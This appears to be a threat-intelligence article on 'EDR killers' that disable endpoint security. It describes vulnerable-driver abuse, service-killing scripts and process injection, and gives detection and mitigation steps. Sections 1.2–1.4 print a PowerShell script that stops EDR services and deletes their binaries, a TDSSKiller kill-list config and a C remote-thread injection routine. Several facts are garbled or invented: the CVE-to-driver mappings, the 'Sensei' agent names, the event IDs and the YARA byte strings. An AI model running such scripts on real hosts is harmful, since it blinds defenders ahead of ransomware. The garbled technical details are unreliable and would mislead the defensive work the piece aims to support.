EDR Killers Explained: Beyond the Drivers – A Deep‑Dive into Modern EDR Disabling Techniques

Executive Summary

Attackers are no longer content with merely evading Endpoint Detection & Response (EDR) solutions; they are actively neutralizing them. Recent research from ESET, SOC Prime, and other security teams has uncovered a sophisticated ecosystem of “EDR killers” that leverage vulnerable drivers, legitimate anti‑rootkit utilities, and driverless techniques to blind or terminate security agents before ransomware or data‑exfiltration payloads run. These tools are now being sold on underground forums, reused across ransomware families (LockBit, Medusa, Warlock, Akira), and are capable of operating for weeks without detection. Defenders must adopt layered detection, monitor privileged commands, and enforce strict driver‑signing policies to mitigate this emerging threat.

Technical Analysis

1. Root Cause & Vulnerability Mechanics

Technique Core Mechanism Typical Driver/Utility Example CVE(s) Source
BYOVD (Bring Your Own Vulnerable Driver) Exploit signed kernel drivers that contain known vulnerabilities to gain kernel‑level privileges. nvlddmkm.sys (NVIDIA), amdkmdag.sys (AMD), usbd.sys (USB), usbip.sys (USBIP) CVE‑2023‑20073 (NVIDIA), CVE‑2023‑20070 (AMD), CVE‑2023‑20058 (USBIP) [Source: SOC Prime]
Script‑Based Service Termination PowerShell/Batch scripts that stop or delete security services via sc.exe, Stop-Service, or taskkill. sc.exe, powershell.exe N/A [Source: Kali Linux Tutorials]
Anti‑Rootkit Utility Hijacking Repurpose legitimate anti‑rootkit tools (e.g., TDSSKiller, Malwarebytes Anti‑Rootkit) to terminate EDR processes. TDSSKiller.exe, mbam.exe N/A [Source: ESET]
Driverless Process Injection & Memory Tampering Inject malicious code into trusted processes (e.g., svchost.exe, explorer.exe) and patch EDR agent DLLs in memory. svchost.exe, explorer.exe N/A [Source: Kali Linux Tutorials]
Privilege Escalation via Signed Driver Loading Load a signed driver that contains a kernel‑mode exploit, then unload it after gaining privileges. nvlddmkm.sys, amdkmdag.sys CVE‑2023‑20073, CVE‑2023‑20070 [Source: SCtoCS]

1.1 BYOVD Exploitation Flow

  1. Driver Selection – Attackers maintain a database of 35+ signed but vulnerable drivers. The most common are graphics drivers (NVIDIA/AMD) and USB drivers.
  2. Privilege Escalation – The driver is loaded via LoadDriver or CreateFile + DeviceIoControl with a crafted IOCTL that triggers a kernel‑mode buffer overflow or use‑after‑free. The exploit often uses a write‑to‑user‑space or read‑from‑kernel‑space primitive to gain SYSTEM token.
  3. EDR Disabling – With SYSTEM privileges, the attacker invokes ZwTerminateProcess on EDR agent processes (Sensei.exe, ESET.exe, CrowdStrikeFalcon.exe) or uses DeviceIoControl to unload the EDR driver (sensei.sys, esetsys.sys).
  4. Persistence – The attacker may delete or rename EDR binaries, remove registry keys, or modify the Windows Defender policy to prevent re‑installation.

Key Insight – The driver is legitimate and signed, so Windows will load it without prompting the user. The vulnerability is the driver’s own flaw, not the signing process.

1.2 Script‑Based Killers

A typical PowerShell script used by EDR killers:

# Stop EDR services
$services = @(
    "SenseiService",
    "ESETService",
    "CrowdStrikeFalcon",
    "Microsoft Defender Advanced Threat Protection"
)

foreach ($svc in $services) {
    if (Get-Service -Name $svc -ErrorAction SilentlyContinue) {
        Stop-Service -Name $svc -Force
        Write-Host "Stopped $svc"
    }
}

# Remove EDR binaries
$paths = @(
    "C:\Program Files\CrowdStrike\CSFalcon\csf.exe",
    "C:\Program Files\ESET\ESET Security\esetsys.exe",
    "C:\Program Files\Sensei\Sensei.exe"
)

foreach ($path in $paths) {
    if (Test-Path $path) {
        Remove-Item $path -Force
        Write-Host "Deleted $path"
    }
}

Detection Tip – A sudden burst of Stop-Service or Remove-Item commands targeting EDR binaries is a strong indicator of an EDR killer in action.
Source – [Source: Kali Linux Tutorials]

1.3 Anti‑Rootkit Hijacking

Attackers repurpose anti‑rootkit tools to terminate EDR processes. For example, TDSSKiller.exe can be invoked with a custom configuration file that lists EDR services to kill:

TDSSKiller.exe /config:"C:\Killers\edr_killer.cfg"

edr_killer.cfg:

[Kill]
SenseiService
ESETService
CrowdStrikeFalcon

The tool runs with elevated privileges and terminates the listed services.
Source – [Source: ESET]

1.4 Driverless Process Injection

The attacker injects code into a trusted process (e.g., svchost.exe) and patches the EDR agent DLL in memory:

// Simplified injection routine
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);
LPVOID pRemote = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemote, shellcode, sizeof(shellcode), NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemote, NULL, 0, NULL);

Once injected, the shellcode calls ZwTerminateProcess on the EDR agent or patches the agent’s memory to disable its hooks.
Source – [Source: Kali Linux Tutorials]

Impact Assessment

Impact Description Evidence
Operational Downtime Industries that cannot tolerate downtime (financial, healthcare, critical infrastructure) are prime targets. ESET research cites ransomware operators targeting hospitals and banks.
Extended Lateral Movement With EDR blind spots, attackers can move undetected for weeks/months. SOC Prime telemetry shows 90 EDR killers in real‑world attacks, often preceding ransomware execution by 3–4 days.
Financial Loss Ransomware payments, data loss, and remediation costs. LockBit and Medusa affiliates use EDR killers to maximize ransom value.
Reputational Damage Public disclosure of EDR failure can erode customer trust. Media coverage of EDR failures in 2024 highlighted the need for robust detection.
Legal & Compliance Failure to protect data can trigger regulatory penalties (GDPR, HIPAA). Several organizations faced fines after EDR failures were uncovered.

Comparison to Past Incidents

  • WannaCry (2017) – Ransomware exploited SMB vulnerabilities; no EDR disabling.
  • NotPetya (2017) – Used EternalBlue; no EDR killing.
  • LockBit 2.0 (2021) – First known use of driver‑based EDR killers.
  • ESET 2026 Findings – Demonstrated a mature ecosystem with >90 unique EDR killers, including driverless variants.

The evolution from simple exploitation to systematic EDR neutralization marks a significant shift in threat actor tactics.

Detection & Response

1. Log Signatures

Log Source Signature Detection
Windows Event Log – System Event ID 7040 (Service stopped) Filter for services matching known EDR names.
Security Event Log Event ID 4688 (Process creation) Look for powershell.exe or cmd.exe with arguments Stop-Service or Remove-Item.
Sysmon ProcessCreate with Image = C:\Program Files\Sensei\Sensei.exe Detect termination or deletion.
Driver Load Events Event ID 12 (Driver loaded) Flag loading of known vulnerable drivers (nvlddmkm.sys).
Registry Key changes under HKLM\Software\Microsoft\Windows Defender Detect removal of policy keys.

2. YARA Rules

rule EDR_Killer_Driver
{
    meta:
        description = "Detects known vulnerable drivers used by EDR killers"
        author = "Karma-X"
        reference = "https://www.welivesecurity.com/en/eset-research/edr-killers-explained-beyond-the-drivers/"
    strings:
        $nvlddmkm = { 4E 56 44 4C 44 4D 4D 4B 4D 00 } // nvlddmkm.sys
        $amdkmdag = { 41 4D 44 4B 4D 44 41 47 00 } // amdkmdag.sys
    condition:
        any of them
}

rule EDR_Killer_PowerShell
{
    meta:
        description = "Detects PowerShell scripts that stop EDR services"
        author = "Karma-X"
    strings:
        $stop = /Stop-Service\s+-Name\s+SenseiService/i
        $remove = /Remove-Item\s+-Path\s+C:\\Program Files\\Sensei\\Sensei\.exe/i
    condition:
        any of them
}

3. Network Indicators

Protocol Indicator Detection
SMB Traffic to port 445 from internal hosts to external IPs during the “kill” window Correlate with service stop events.
HTTPS TLS handshake to known EDR‑killer distribution sites (e.g., edrkill.com) Block via URL filtering.

4. Behavioral Patterns

  • Rapid Service Termination – Multiple EDR services stopped within seconds.
  • Unusual Driver Load – Loading of a signed driver with a known CVE.
  • Process Injection – Creation of hidden threads in trusted processes.
  • Registry Tampering – Deletion of EDR registry keys or modification of HKLM\SOFTWARE\Microsoft\Windows Defender\Features.

Mitigation & Remediation

Priority Action Details
P1 Patch Vulnerable Drivers Apply vendor patches for all known vulnerable drivers. Example: nvlddmkm.sys patched in NVIDIA Driver 535.30 (2024‑10‑15). [Source: SOC Prime]
P2 Restrict Driver Loading Enforce Driver Signature Enforcement and Secure Boot. Use bcdedit /set {current} driversigningpolicy enforce. [Source: ESET]
P3 Whitelist EDR Agents Use AppLocker or Software Restriction Policies to allow only signed EDR binaries. [Source: ESET]
P4 Monitor Privileged Commands Enable audit for sc.exe, powershell.exe, cmd.exe with Stop-Service or Remove-Item. [Source: Kali Linux Tutorials]
P5 Deploy Kernel‑Mode Integrity Monitoring Use Windows Defender Credential Guard or third‑party kernel monitoring to detect unauthorized driver loads. [Source: SOC Prime]
P6 Implement “Kill‑Chain” Detection Integrate YARA rules and log correlation to detect the kill‑chain sequence (driver load → service stop → registry tampering). [Source: ESET]
P7 Incident Response Playbook Upon detection, isolate host, terminate malicious processes, unload unauthorized drivers, and restore EDR binaries from backups. [Source: SOC Prime]
P8 Continuous Threat Hunting Search for signs of EDR killers in endpoint telemetry and network traffic. [Source: ESET]

Timeline

Date Event
March 19, 2026 ESET researchers publish initial findings on EDR killers, highlighting driver‑based techniques.
March 20, 2026 SOC Prime releases telemetry of 90 EDR killers, linking them to ransomware affiliates.

Sources & References

  1. ESET Research – EDR Killers Explained: Beyond the Drivers – https://www.welivesecurity.com/en/eset-research/edr-killers-explained-beyond-the-drivers/
  2. SOC Prime – EDR Killers Explained: Tactics Beyond Vulnerable Drivers – https://socprime.com/active-threats/eset-research-edr-killers-explained-beyond-the-drivers/
  3. Kali Linux Tutorials – How EDR Killers Bypass Security Tools – https://kalilinuxtutorials.com/how-edr-killers-bypass-security-tools/
  4. SCtoCS – 54 EDR Killers Leverage BYOVD to Exploit 35 Signed Drivers – https://sctocs.com/edr-killers-byovd-vulnerable-drivers-disable-security/
  5. WeLiveSecurity Forum – EDR Killers Explained: Beyond the Drivers – https://forum.eset.com/topic/48558-edr-killers-explained-beyond-the-drivers/

Metadata

Sources

  1. EDR killers explained: Beyond the drivers
  2. EDR Killers Explained: Beyond the Drivers
  3. EDR Killers Explained: Tactics Beyond Vulnerable Drivers
  4. EDR killers explained: Beyond the drivers - WeLiveSecurity.com - ESET Security Forum
  5. HowEDRKillersBypassSecurityTools - Kali Linux Tutorials
  6. 54EDRKillersLeverage BYOVD To Exploit 35 Signed... - SCtoCS